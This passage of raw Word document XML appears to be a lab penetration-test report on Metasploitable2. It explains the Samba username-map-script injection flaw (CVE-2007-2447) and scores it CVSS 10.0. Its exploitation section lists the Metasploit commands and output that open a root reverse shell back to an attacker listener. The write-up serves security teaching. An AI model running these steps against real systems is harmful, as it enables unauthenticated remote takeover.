                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7EF0E"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4 – Metasploit module search results for “samba”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACA9F44"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC6878E" wp14:editId="544B2575">
            <wp:extent cx="5762625" cy="2266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266950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CA981"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5 – Additional Samba exploit modules, including trans2open variants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F7D61"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Given the target profile matched a well-known intentionally vulnerable training image, the module exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was selected. This module targets CVE-2007-2447, a command injection flaw in Samba's “username map script” configuration option (affecting Samba 3.0.20 through 3.0.25rc3), which allows shell metacharacters supplied in an SMB login request to be executed by the underlying </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>MsRpcCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> — resulting in unauthenticated remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49989B"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5. Vulnerability Deep Dive: CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157025CA"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lastRenderedPageBreak/>
        <w:t>5.1 Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6661B2"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 xml:space="preserve">Samba's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daemon supports an optional configuration directive, username map script, which allows an administrator to point Samba at an external script for mapping incoming SMB usernames to local Unix accounts (typically configured in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>smb.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> as: username map script = /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/samba/scripts/mapusers.sh). When a client authenticates, Samba passes the supplied username to this script through a call chain that ultimately invokes it via a shell (/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c) rather than executing it as a discrete argument vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE9CB1"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 xml:space="preserve">Because the username field is attacker-controlled and reaches a shell invocation without adequate sanitization, an attacker can embed shell metacharacters — for example a piped command wrapped in backticks or parentheses — inside the username field of an SMB session-setup request. When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hands that string to the mapping script, the embedded metacharacters are interpreted by the shell rather than treated as literal username data, resulting in arbitrary command execution in the security context of the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process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E0086"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 xml:space="preserve">On Metasploitable2 specifically,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runs as root and the vulnerable configuration is enabled by default, meaning any command injected through this path executes with root privileges — which is exactly what was observed in Section 6, where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> returned root immediately upon shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B706CC"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5.2 Why No Authentication Was Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C8C29"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malicious payload is delivered as part of the SMB authentication/session-setup exchange itself — specifically in the username field sent before any valid credential check succeeds or fails. The command injection therefore triggers during the login attempt, meaning a valid username or password is never needed. This is what makes the vulnerability pre-authentication and unauthenticated: the attacker does not need any account on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9E8BF" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5.3 CVSS v3.1 Scoring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300"/>
        <w:gridCol w:w="6050"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="7A53F730" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B92B7C9"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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06A1700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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="373C413C" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="023ED83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Attack Vector (AV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3FF864B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Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="3982CA8C" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1D9F5E3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Attack Complexity (AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05EEE98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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="7DFC7EE1" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69A12E2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Privileges Required (PR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6774917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None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="6EED0120" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A9C6DF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User Interaction (UI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E3413E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None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="47B66CA8" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="155111E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Scope (S)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="62288656"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Unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="43F74F45" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3C733396"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Confidentiality (C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A8ED111"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="5A41508A" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01A8D89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Integrity (I)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="458A007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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="7189252F" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16BBABF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Availability (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38C17A9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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="338B2A6A" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3564619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Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="67012F9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10.0 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="6E54F369" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CE702B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Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="455F2681" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C0AE719"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A base score of 10.0 reflects the maximum-severity combination of a network-reachable, low-complexity, unauthenticated vulnerability that yields full compromise of confidentiality, integrity, and availability — consistent with the root-level remote shell obtained during this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59508FE9"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6. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADB1B8"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit module was configured with the target and callback (attacker) parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C878BAD"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r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>use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br/>
        <w:t>set RHOSTS 192.168.11.130</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>set LHOST 192.168.11.129</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>set RPORT 139</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57064FA7"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E8CF4C" wp14:editId="3B656FA0">
            <wp:extent cx="5762625"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209800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="282AA86A"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6 – Exploit module configured with RHOSTS, LHOST, and RPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078BAFD2"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Execution of the exploit successfully opened a reverse TCP command shell session from the target back to the attacker's listener on port 4444:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E4BF71"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r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*] Started reverse TCP handler on 192.168.11.129:4444</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[*] Command shell session 3 opened</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168.11.129:4444 -&gt; 192.168.11.130:37650)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269115B7"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D781EDF" wp14:editId="4445315F">
            <wp:extent cx="5762625"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714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FAC1C8" w14:textId="09B5D8A9" w:rsidR="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 7 – Reverse TCP command shell session established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20459367" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRDefault="003A2A16">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCCF9E" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
